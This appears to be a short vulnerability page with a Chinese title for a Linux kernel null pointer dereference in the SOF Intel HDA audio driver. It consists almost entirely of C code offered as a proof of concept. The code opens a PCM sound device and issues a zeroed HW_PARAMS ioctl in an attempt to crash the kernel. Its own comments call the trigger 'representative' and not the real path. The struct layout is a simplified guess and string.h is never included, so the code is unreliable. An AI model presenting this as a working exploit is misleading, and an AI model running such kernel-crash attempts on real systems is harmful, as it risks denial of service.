CVE-2026-43137 Linux Kernel空指针解引用漏洞

/* * PoC for CVE-2026-43137: Kernel Null Pointer Dereference in SOF Intel HDA * This PoC demonstrates the trigger condition for the NULL pointer dereference. * It attempts to setup a stream that relies on a missing widget. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // Simplified definitons for the sake of the PoC #define SND_PCM_IOCTL_HW_REFINE 0x40104110 #define SND_PCM_IOCTL_HW_PARAMS 0x41104111 struct snd_pcm_hw_params { unsigned int flags; unsigned int masks[8]; unsigned int mvals[4]; unsigned int rmask; unsigned int cmask; unsigned int info; unsigned int msbits; unsigned int rate_num; unsigned int rate_den; unsigned int periods; unsigned int buffer_size; }; int main() { int fd; struct snd_pcm_hw_params params; // Attempt to open the PCM device (e.g., default or hw:0,0) // The specific device depends on the hardware using the Intel HDA driver fd = open("/dev/snd/pcmC0D0p", O_RDWR | O_NONBLOCK); if (fd < 0) { perror("Failed to open audio device"); return -1; } printf("Device opened. Attempting to trigger vulnerability via topology mismatch...\n"); // Zero out params to simulate invalid/broken topology configuration // In a real exploit scenario, specific parameters would be set to trigger // the code path where the widget is NULL. memset(&params, 0, sizeof(params)); // Trigger the ioctl that calls into the faulty hda_dai_get_ops function // This is a representative call; the actual trigger may require specific // stream setups or topology loading. if (ioctl(fd, SND_PCM_IOCTL_HW_PARAMS, &params) < 0) { perror("Ioctl failed (expected if crash did not occur immediately)"); } close(fd); printf("PoC execution finished.\n"); return 0; }